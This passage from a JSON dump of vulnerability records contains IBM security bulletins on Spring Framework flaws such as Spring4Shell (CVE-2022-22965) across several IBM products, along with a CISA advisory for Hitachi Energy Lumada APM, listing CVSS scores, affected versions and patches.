7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:01:27", "description": "## Summary\n\nIBM Sterling File Gateway is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring Framework is used in the web application. Updated Spring library will be shipped in upcoming fix pack.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling File Gateway| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1 \n \n## Remediation/Fixes\n\n**Product(s)**| **Version(s)**| **Remediation/Fix \n** \n---|---|--- \nIBM Sterling File Gateway| 6.0.0.0 - 6.0.3.6, 6.1.0.0 - 6.1.0.5, 6.1.1.1| We have released 6.1.2.0 with non-vulnerable spring framework jars that can be downloaded from Passport Advantage \n \n## Workarounds and Mitigations\n\nIBM Sterling File Gateway is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Out of an abundance of caution, we will upgrade Spring Framework in our future release.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-03T20:30:44", "type": "ibm", "title": "Security Bulletin: IBM Sterling File Gateway is affected by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-08-03T20:30:44", "id": "07FEC8A129A779FAB145D3092FB4D733884D03DF23AA13470BF539F0AAE36C84", "href": "https://www.ibm.com/support/pages/node/6574421", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T06:04:22", "description": "## Summary\n\nIBM Edge Application Manager is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used to handle the REST calls and protocol when the tomcat http server is created. The fix includes Spring 5.3.18.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Edge Application Manger| 4.3 \n \n\n\n## Remediation/Fixes\n\nThis bulletin provides a remediation for vulnerability [CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>). Please act swiftly by upgrading IBM Edge Application Manager to the latest version <https://www.ibm.com/docs/en/eam/4.3?topic=hub-passport-advantage>. This includes updates to Spring Framework which addresses any potential exposure to the Spring4Shell vulnerabilities.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T04:27:23", "type": "ibm", "title": "Security Bulletin: IBM Edge Application Manager is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965))", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-06-02T04:27:23", "id": "E4D093275B3398CF07F3141B553D072C5304E4F560EE4AEFD306FE5B5472E00B", "href": "https://www.ibm.com/support/pages/node/6591361", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:51:06", "description": "## Summary\n\nIBM Tivoli Monitoring is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. The Tivoli Enterprise Portal Server (CQ) component includes but does not use it. The fix removes Spring from the product.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 - 6.3.0.7 (up to 6.3.0.7 Service pack 10) \n \n\n\n## Remediation/Fixes\n\nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0012| 6.3.0.7 Fix Pack 7 Service Pack 12| <https://www.ibm.com/support/pages/ibm-tivoli-monitoring-630-fix-pack-7-service-pack-12-6307-tiv-itm-sp0012> \nThe fix requires the system is at 630 Fix pack 7 or later as a prerequisite. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-30T17:31:59", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Monitoring is affected but not classified as vulnerable by a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-12-30T17:31:59", "id": "DA39104C275021EF88649293DFAF282637E8219443A30527A58A6E25E7ABA491", "href": "https://www.ibm.com/support/pages/node/6587154", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:54:05", "description": "## Summary\n\nCloud Pak for Security (CP4S) 1.9.1.0 and earlier is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965) as it does not meet all of the following criteria: 1. JDK 9 or higher, 2. Apache Tomcat as the Servlet container, 3. Packaged as WAR (in contrast to a Spring Boot executable jar), 4. Spring-webmvc or spring-webflux dependency, 5. Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions. Spring is used in CP4S as a base framework for Java components. It is consumed through Spring Boot Parent. The fix includes Spring Boot Parent 2.6.6. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nCloud Pak for Security (CP4S)| 1.8.1.0 \nCloud Pak for Security (CP4S)| 1.9.1.0 \nCloud Pak for Security (CP4S)| 1.9.0.0 \nCloud Pak for Security (CP4S)| 1.8.0.0 \n \n\n\n## Remediation/Fixes\n\nIBM encourages customers to update their systems promptly. \n\nPlease upgrade to at least CP4S 1.10.0.0 following these instructions: <https://www.ibm.com/docs/en/cloud-paks/cp-security/1.10?topic=installing-upgrading-cloud-pak-security>\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-01T18:28:41", "type": "ibm", "title": "Security Bulletin: Cloud Pak for Security is affected by but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-11-01T18:28:41", "id": "4AF3DEB82989B4E6746A3E3F13D975DBE8BF4FDB968286C60FFA2743AA829CC4", "href": "https://www.ibm.com/support/pages/node/6833578", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T21:42:40", "description": "## Summary\n\nThere is a vulnerability in Spring Framework that could allow a local attacker to execute arbitrary code on the system. The code is used by IBM Process Mining. This bulletin identifies the security fixes to apply to address the vulnerability. The product is in an affected but not vulnerable state\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22965](<https://vulners.com/cve/CVE-2022-22965>) \n** DESCRIPTION: **Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by the improper handling of PropertyDescriptor objects used with data binding. By sending specially-crafted data to a Spring Java application, an attacker could exploit this vulnerability to execute arbitrary code on the system. Note: The exploit requires Spring Framework to be run on Tomcat as a WAR deployment with JDK 9 or higher using spring-webmvc or spring-webflux. Note: This vulnerability is also known as Spring4Shell or SpringShell. \nCVSS Base score: 9.8 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223103](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223103>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Process Mining| 1.12.0.4 \n \n## Remediation/Fixes\n\n**Remediation/Fixes guidance**:\n\n**Product(s)**| **Version(s) number and/or range **| **Remediation/Fix/Instructions** \n---|---|--- \nIBM Process Mining| 1.12.0.4| \n\n**Upgrade to version 1.12.0.5** \n \n1.Login to [PassPortAdvantage](<https://www-112.ibm.com/software/howtobuy/passportadvantage/homepage/paocustomer> \"\" ) \n \n2\\. Search for \n**M0682ML** Process Mining 1.12.0.5 Server Multiplatform Multilingual \n \n3\\. Download package\n\n4\\. Follow install instructions \n \n5\\. Repeat for **M0681ML** Process Mining 1.12.0.5 Client Windows Multilingual \n \n| | \n \n## Workarounds and Mitigations\n\nNone Known\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-01T21:43:23", "type": "ibm", "title": "Security Bulletin: Vulnerability in Spring Framework affects IBM Process Mining and could allow a local attacker to execute arbitrary code on the system (CVE-2022-22965)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-02-01T21:43:23", "id": "EDAF5143E634E5EF55D5C0186ECF166CE8CE37DFE44681979D15F0D7CA2DAFAD", "href": "https://www.ibm.com/support/pages/node/6606977", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-24T05:54:47", "description": "## Summary\n\nIBM Sterilng B2B Integrator has addressed security vulnerabilities in Spring Framework.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22096](<https://vulners.com/cve/CVE-2021-22096>) \n** DESCRIPTION: **VMware Spring Framework could allow a remote attacker to bypass security restrictions. By sending a specially-crafted input, an attacker could exploit this vulnerability to cause the insertion of additional log entries. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212430](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212430>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6 \nIBM Sterling B2B Integrator| 6.1.0.0 - 6.1.0.5, 6..1.1.0 - 6.1.1.1 \n \n\n\n## Remediation/Fixes\n\n** Product**| **Version**| **APAR**| **Remediation &amp; Fix** \n---|---|---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6| IT41291| Apply 6.0.3.7, 6.1.0.6, 6.1.1.2 or 6.1.2.0 \nIBM Sterling B2B Integrator| 6.1.0.0 - 6.1.0.5 \n\n6.1.1.0 - 6.1.1.1\n\n| \n\nIT41291\n\n| Apply 6.1.0.6, 6.1.1.2 or 6.1.2.0 \n \nThe version 6.0.3.7 , 6.1.0.6 and 6.1.1.2 are available on [Fix Central](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Other%2Bsoftware&product=ibm/Other+software/Sterling+B2B+Integrator&release=All&platform=All&function=all>). The IIM version of 6.1.2.0 is available in IBM Passport Advantage. The container version of 6.1.2.0 is available in IBM Entitled Registry with following tags. \n\ncp.icr.io/cp/ibm-b2bi/b2bi:6.1.2.0 for IBM Sterling B2B Integrator \ncp.icr.io/cp/ibm-sfg/sfg:6.1.2.0 for IBM Sterling File Gateway\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-10-14T21:50:51", "type": "ibm", "title": "Security Bulletin: IBM Sterling B2B Integrator vulnerable due to Spring Framework (CVE-2021-22096, CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22096", "CVE-2022-22950"], "modified": "2022-10-14T21:50:51", "id": "CE1EA8BD930C36AD90F7CB9A4D45A1E00F086D40B88449DF5CAD4F426F6C3DF7", "href": "https://www.ibm.com/support/pages/node/6829591", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:P/A:N"}}], "ics": [{"lastseen": "2023-09-09T20:51:44", "description": "## 1\\. EXECUTIVE SUMMARY\n\n * **CVSS v3 7.5**\n * **ATTENTION:** Exploitable remotely/public exploits are available\n * **Vendor:** Hitachi Energy\n * **Equipment:** Lumada Asset Performance Manager (APM)\n * **Vulnerabilities:** Allocation of Resources Without Limits or Throttling, Code injection\n\n## 2\\. RISK EVALUATION\n\nSuccessful exploitation of these vulnerabilities could crash the Prognostic Model Executor and could allow remote code execution.\n\n## 3\\. TECHNICAL DETAILS\n\n### 3.1 AFFECTED PRODUCTS\n\nThe following versions of Lumada Asset Performance Manager with the Prognostic Model Executor Service enabled are affected:\n\n * Lumada Asset Performance Manager (APM) online service (SaaS) version 6.3.220323.0 and prior\n * Lumada Asset Performance Manager (APM) versions 6.0.0.0 to 6.0.0.4\n * Lumada Asset Performance Manager (APM) versions 6.1.0.0 and 6.1.0.1\n * Lumada Asset Performance Manager (APM) versions 6.2.0.0 to 6.2.0.2\n * Lumada Asset Performance Manager (APM) versions 6.3.0.0 to 6.3.0.2\n\n### 3.2 VULNERABILITY OVERVIEW\n\n#### 3.2.1 [ALLOCATION OF RESOURCES WITHOUT LIMITS OR THROTTLING CWE-770](<https://cwe.mitre.org/data/definitions/770.html>)\n\nA vulnerability exists in the Spring Framework component included in the Prognostic Model Executor service of the affected product. An attacker could exploit this vulnerability by sending a specially crafted data or configuration to the application either directly or via integrated applications, causing the Prognostic Model Executor service to fail.\n\n[CVE-2022-22950](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22950>) has been assigned to this vulnerability. A CVSS v3 base score of 3.1 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L>)).\n\n#### 3.2.2 [IMPROPER CONTROL OF GENERATION OF CODE ('CODE INJECTION') CWE-94](<https://cwe.mitre.org/data/definitions/94.html>)\n\nA vulnerability in the Spring Framework component included in the Prognostic Model Executor service could allow an attacker to inject arbitrary code for remote code execution.\n\n[CVE-2022-22965](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22965>) has been assigned to this vulnerability. A CVSS v3 base score of 7.5 has been assigned; the CVSS vector string is ([AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H](<https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H>)).\n\n### 3.3 BACKGROUND\n\n * **CRITICAL INFRASTRUCTURE SECTORS:** Energy\n * **COUNTRIES/AREAS DEPLOYED: **Worldwide\n * **COMPANY HEADQUARTERS LOCATION: **Switzerland\n\n### 3.4 RESEARCHER\n\nHitachi Energy reported these vulnerabilities to CISA.\n\n## 4\\. MITIGATIONS\n\nHitachi Energy recommends applying the most recent patch version of Lumada Asset Performance Management (APM) or upgrading to a newer, unaffected major version:\n\n * Lumada Asset Performance Manager (APM) versions 6.0.0.0 to 6.0.0.4: Apply patch version 6.0.0.5 or upgrade to 6.2.0.3\n * Lumada Asset Performance Manager (APM) versions 6.1.0.0 and 6.1.0.1: Apply patch version 6.1.0.2 or upgrade to 6.2.0.3\n * Lumada Asset Performance Manager (APM) versions 6.2.0.0 to 6.2.0.2: Apply patch version 6.2.0.4 or upgrade to 6.4.0.0\n * Lumada Asset Performance Manager (APM) versions 6.3.0.0 to 6.3.0.2: Apply patch version 6.3.0.3 or upgrade to 6.4.0.0\n\nNote: For Lumada Asset Performance Manager (APM) online service (SaaS) version 6.3.220323.0 and prior, Hitachi Energy has already updated all SaaS environments.\n\nFor additional information, support and to upgrade users should contact [Hitachi Energy](<https://www.hitachienergy.com/contact-us>).\n\nHitachi Energy recommends disabling the Prognostic Model Executor service if users cannot upgrade to the latest patch version.\n\nUsers should be aware that disabling the Prognostic Model Executor service will have the following impact:\n\n * Disabling the Prognostic Model Executor service will cause the Lumada APM application to stop performing condition assessment calculations (for all assets configured to use prognostic models) and to accumulate calculation requests in the internal messaging queue. As the requests in the queue have a limited lifetime (set by messaging bus topic retention), when that lifetime expires, the request will be lost.\n * When the Prognostic Model Executor service is restored to function (after applying the suggested remediation steps and according to the installation guide) it will start processing the accumulated requests. When the period of accumulation is long, this may result in a prolonged period of intensive calculations.\n * If any requests were lost, the affected assets may be missing historical or even current condition assessments. To ensure the current assessments are up to date, the customer should trigger recalculation of condition of all assets using the performance models.\n\nHitachi Energy also recommends following the least privilege principle by limiting and controlling access to the \u201cAdministrator\u201d role or \u201cImport\u201d role privileges in the application programmable interface (API). \nFor more information, users should see Hitachi Energy advisory [8DBD000105](<https://search.abb.com/library/Download.aspx?DocumentID=8DBD000105>).\n\nCISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability these vulnerabilities. Specifically, users should:\n\n * Minimize network exposure for all control system devices and/or systems, and ensure they are [not accessible from the Internet](<https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01>).\n * Locate control system networks and remote devices behind firewalls and isolate them from business networks.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as its connected devices.\n\nCISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\n\nCISA also provides a section for [control systems security recommended practices](<https://us-cert.cisa.gov/ics/Recommended-Practices>) on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>). Several CISA products detailing cyber defense best practices are available for reading and download, including [Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies](<https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf>).\n\nAdditional mitigation guidance and recommended practices are publicly available on the ICS webpage at [cisa.gov/ics](<https://cisa.gov/ics>) in the technical information paper, [ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies](<https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B>).\n\nOrganizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.\n\nThese vulnerabilities have a high attack complexity.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-13T12:00:00", "type": "ics", "title": "Hitachi Energy Lumada Asset Performance Management Prognostic Model Executor Service", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950", "CVE-2022-22965"], "modified": "2022-10-13T12:00:00", "id": "ICSA-22-286-05", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-22-286-05", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cert": [{"lastseen": "2023-07-22T11:15:11", "description": "### Overview\n\nThe Spring Framework insecurely handles PropertyDescriptor objects, which may allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description\n\nThe [Spring 